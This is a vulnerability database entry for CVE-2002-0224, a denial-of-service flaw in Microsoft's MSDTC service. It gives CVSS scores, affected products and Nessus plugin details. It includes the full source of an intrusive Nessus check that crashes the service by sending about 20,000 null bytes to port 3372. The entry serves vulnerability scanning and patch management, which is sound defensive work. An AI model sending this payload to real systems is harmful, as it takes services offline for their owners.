Vulnerabilities > CVE-2002-0224 - Denial of Service vulnerability in Microsoft products

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

NONE

Integrity impact

NONE

Availability impact

PARTIAL

network

low complexity

microsoft

nessus

NVD

Published: 2002-05-16

Updated: 2019-04-30

Summary

The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input.

Vulnerable Configurations

Part	Description	Count
Application	Microsoft Microsoft Internet Information Services 5.0 Microsoft SQL Server 6.5 Microsoft SQL Server 7.0 Microsoft SQL Server 2000	9
OS	Microsoft Microsoft Windows 2000 *	3

Nessus

NASL family	Windows
NASL id	MSDTC_DOS.NASL
description	By sending a long series of malformed data (such as 20200 NULL bytes) to the remote Windows MSDTC service, it is possible for an attacker to cause the associated MSDTC.EXE to use 100% of the available CPU and exhaust kernel resources.
last seen	2020-06-01
modified	2020-06-02
plugin id	10939
published	2002-04-20
reporter	This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10939
title	MS02-018: Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS (319733) (intrusive check)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10939); script_version("1.33"); script_cvs_date("Date: 2018/11/15 20:50:27"); script_cve_id("CVE-2002-0224"); script_bugtraq_id(4006); script_xref(name:"MSFT", value:"MS02-018"); script_xref(name:"MSKB", value:"319733"); script_name(english:"MS02-018: Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS (319733) (intrusive check)"); script_summary(english:"crash the MSDTC service"); script_set_attribute( attribute:"synopsis", value:"The remote service is prone to a denial of service attack." ); script_set_attribute( attribute:"description", value: "By sending a long series of malformed data (such as 20200 NULL bytes) to the remote Windows MSDTC service, it is possible for an attacker to cause the associated MSDTC.EXE to use 100% of the available CPU and exhaust kernel resources." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Apr/290" ); script_set_attribute(attribute:"solution", value: "Microsoft has reportedly included the fix in MS02-018."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"see_also", value: "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2002/ms02-018" ); script_set_attribute(attribute:"plugin_publication_date", value: "2002/04/20"); script_set_attribute(attribute:"vuln_publication_date", value: "2002/01/31"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:internet_information_server"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:sql_server"); script_end_attributes(); script_category(ACT_DENIAL); script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc."); script_family(english:"Windows"); script_dependencie("find_service1.nasl"); script_require_ports("Services/msdtc", 3372); exit(0); } # # Here we go # include("global_settings.inc"); include("misc_func.inc"); port = get_service(svc:"msdtc", default: 3372, exit_on_fail: 1); soc = open_sock_tcp(port); if(!soc)exit(1); # 20020 = 20*1001 zer = raw_string(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0); send(socket:soc, data:zer) x 1001; close(soc); sleep(2); if (service_is_dead(port: port) > 0) security_hole(port);

NASL family	Windows : Microsoft Bulletins
NASL id	SMB_NT_MS02-018.NASL
description	The remote version of Windows contains multiple flaws in the Internet Information Service (IIS), such as heap overflow, DoS, and XSS that could allow an attacker to execute arbitrary code on the remote host with SYSTEM privileges.
last seen	2020-06-01
modified	2020-06-02
plugin id	10943
published	2002-04-23
reporter	This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10943
title	MS02-018: Cumulative Patch for Internet Information Services (327696)

Summary

Vulnerable Configurations

Nessus

References